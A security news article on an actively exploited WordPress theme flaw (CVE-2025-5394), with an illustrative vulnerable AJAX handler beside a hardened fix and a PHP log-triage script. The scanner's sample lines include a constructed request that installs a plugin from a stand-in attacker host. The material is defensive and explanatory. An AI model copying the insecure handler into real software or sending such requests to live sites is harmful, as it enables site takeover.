A severe security vulnerability in a widely used WordPress theme, “Alone – Charity Multipurpose Non-profit WordPress Theme,” is being actively exploited by threat actors, leading to widespread website hijacks. The critical flaw, tracked as CVE-2025-5394 with a CVSS score of 9.8, allows unauthenticated attackers to remotely install malicious plugins and achieve full control over vulnerable sites.
Security researchers at Wordfence credit Thái An with discovering and reporting the bug. The vulnerability stems from a missing capability check in the theme’s alone_import_pack_install_plugin() function, which is reachable through WordPress’s AJAX endpoint and therefore lets unauthorized users install arbitrary plugins fetched from remote sources. Because a plugin is simply PHP code that WordPress loads and runs, this single missing check is enough for an attacker to upload malicious files, execute code remotely, and take over the site.
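To make the root cause concrete, the following is an illustrative reconstruction added for this article; it is not the Alone theme’s actual code. Only the action name alone_import_pack_install_plugin and the standard wp_ajax_{action} / wp_ajax_nopriv_{action} hook convention come from the advisory; the POST parameter name, the allow-list contents, the nonce action and the _secure function name are assumptions. The vulnerable and hardened variants are shown in one file for comparison; a real theme would contain only one of them.

```php
<?php
// Added illustration for this article; NOT the Alone theme's actual code.
// Hook names follow WordPress' wp_ajax_{action} convention; every other
// identifier (parameter names, allow-list, nonce action) is an assumption.

// --- Vulnerable pattern ---------------------------------------------------
// Registering on the "nopriv" hook makes the handler reachable without a
// session, and the body never asks who is calling or where the ZIP comes
// from, so an anonymous POST to /wp-admin/admin-ajax.php installs a plugin
// from an attacker-chosen URL.
add_action( 'wp_ajax_alone_import_pack_install_plugin',        'alone_import_pack_install_plugin' );
add_action( 'wp_ajax_nopriv_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin' );

function alone_import_pack_install_plugin() {
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $zip_url  = isset( $_POST['plugin'] ) ? $_POST['plugin'] : '';   // caller-controlled (assumed parameter name)
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $upgrader->install( $zip_url );   // downloads the ZIP and unpacks it into wp-content/plugins
    wp_die();
}

// --- Hardened version -----------------------------------------------------
// Three independent controls: a nonce (CSRF), a capability check (authz),
// and an allow-list so the install source is never caller-controlled.
// Deliberately NO wp_ajax_nopriv_* registration.
add_action( 'wp_ajax_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin_secure' );

function alone_import_pack_install_plugin_secure() {
    // 1. CSRF: dies with -1 unless the request carries a nonce minted for this action.
    check_ajax_referer( 'alone_import_pack', 'nonce' );

    // 2. Authorization: the caller must hold the capability WordPress itself
    //    requires for plugin installation.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Input: the client names a slug, the server decides the URL.
    //    (Assumed allow-list; a real theme would ship its own table.)
    $allowed = array(
        'classic-editor' => 'https://downloads.wordpress.org/plugin/classic-editor.latest-stable.zip',
    );
    $slug = isset( $_POST['plugin'] ) ? sanitize_key( wp_unslash( $_POST['plugin'] ) ) : '';
    if ( ! isset( $allowed[ $slug ] ) ) {
        wp_send_json_error( array( 'message' => 'unknown plugin' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $allowed[ $slug ] );   // true on success, false/WP_Error otherwise
    if ( true !== $result ) {
        wp_send_json_error( array( 'message' => 'install failed' ), 500 );
    }
    wp_send_json_success( array( 'installed' => $slug ) );
}
```

The order of the checks matters less than their independence: the nonce alone would not stop a logged-in subscriber who can obtain one from a page, the capability check alone would not stop a CSRF against an administrator, and the allow-list closes the remote-source problem even if the first two are ever bypassed.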
Reports indicate that exploitation attempts began as early as July 12, just two days before the vulnerability was publicly disclosed, suggesting that attackers were closely monitoring code changes for newly addressed flaws. Wordfence alone has already blocked over 120,900 exploit attempts targeting this vulnerability.
In observed attacks, hackers are uploading ZIP archives disguised as legitimate plugins (such as “wp-classic-editor.zip” or “background-image-cropper.zip”). These archives contain PHP-based backdoors designed to execute remote commands, upload additional files, and even create rogue administrator accounts, effectively locking out legitimate site owners. Fully-featured file managers are also being injected, granting attackers complete control over the compromised server.
The developers of the “Alone” theme addressed the vulnerability in version 7.8.5, released on June 16, 2025. WordPress site owners using this theme are strongly urged to update to the latest version immediately. Administrators should also check for suspicious new administrator accounts, review their web server logs for requests to /wp-admin/admin-ajax.php with action=alone_import_pack_install_plugin (bearing in mind that an action parameter sent in the POST body does not appear in standard access logs, so a clean log is not proof of a clean site), look for unexpected directories under wp-content/plugins, and run thorough security scans to identify and remove any lingering malicious files or backdoors. This incident is a stark reminder of the ongoing importance of timely updates and robust security practices in the WordPress ecosystem.
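As an added triage helper for the log-review step above (written for this article, not published by Wordfence or the theme authors), the script below walks an Apache/Nginx combined-format access log, flags requests to admin-ajax.php whose query string names the vulnerable action, and tallies hits per source IP. It assumes PHP 8 or later; the log lines embedded for the no-argument run are constructed samples, and the plugin= parameter name is an assumption.

```php
<?php
// Added triage script for this article; not from Wordfence or the theme.
// Requires PHP 8+ (str_ends_with, named groups, null coalescing).
// Usage: php scan-alone-ajax.php /var/log/apache2/access.log
// Without an argument it runs over the constructed sample lines below.

const TARGET_ACTION = 'alone_import_pack_install_plugin';

// Combined Log Format: ip ident user [ts] "METHOD URI PROTO" status bytes "referer" "ua"
const LOG_RE = '#^(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<uri>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\S+)(?: "(?<ref>[^"]*)" "(?<ua>[^"]*)")?#';

function parse_line( string $line ): ?array {
    if ( ! preg_match( LOG_RE, $line, $m ) ) {
        return null;   // blank line or a format this regex does not understand
    }
    $parts = parse_url( $m['uri'] );
    $query = array();
    if ( isset( $parts['query'] ) ) {
        parse_str( $parts['query'], $query );
    }
    return array(
        'ip'     => $m['ip'],
        'ts'     => $m['ts'],
        'method' => $m['method'],
        'path'   => $parts['path'] ?? $m['uri'],
        'query'  => $query,
        'status' => (int) $m['status'],
    );
}

// A hit is any request to admin-ajax.php whose query string names the
// vulnerable action. Blind spot: WordPress AJAX clients usually send
// "action" in the POST body, which standard access logs do not record,
// so an empty result does NOT prove the site was untouched.
function is_exploit_hit( array $req ): bool {
    return str_ends_with( $req['path'], '/wp-admin/admin-ajax.php' )
        && ( $req['query']['action'] ?? '' ) === TARGET_ACTION;
}

function scan( iterable $lines ): array {
    $hits = array();
    foreach ( $lines as $line ) {
        $req = parse_line( rtrim( (string) $line, "\r\n" ) );
        if ( $req !== null && is_exploit_hit( $req ) ) {
            $hits[] = $req;
        }
    }
    return $hits;
}

// Constructed sample lines; none of these are real requests. The third line
// carries the action in the POST body and is therefore invisible to this scan.
$sample = array(
    '203.0.113.7 - - [12/Jul/2025:03:14:07 +0000] "POST /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin HTTP/1.1" 200 87 "-" "python-requests/2.32"',
    '198.51.100.23 - - [12/Jul/2025:03:15:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jul/2025:03:16:42 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 87 "-" "python-requests/2.32"',
    '192.0.2.55 - - [13/Jul/2025:11:02:09 +0000] "GET /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin&plugin=http://evil.example/wp-classic-editor.zip HTTP/1.1" 200 87 "-" "curl/8.5"',
);

$lines = isset( $argv[1] ) ? new SplFileObject( $argv[1] ) : $sample;
$by_ip = array();
foreach ( scan( $lines ) as $hit ) {
    $by_ip[ $hit['ip'] ] = ( $by_ip[ $hit['ip'] ] ?? 0 ) + 1;
    printf( "%s %s %s %d plugin=%s\n",
        $hit['ts'], $hit['ip'], $hit['method'], $hit['status'],
        $hit['query']['plugin'] ?? '(not in query string)' );
}
foreach ( $by_ip as $ip => $n ) {
    printf( "%s: %d hit(s)\n", $ip, $n );
}
```

Treat every flagged IP as a lead, not a verdict: a 200 from admin-ajax.php does not by itself confirm a successful install, and the reverse, a quiet log, is exactly what a POST-body exploit looks like. Corroborate with directory timestamps under wp-content/plugins and with the user table.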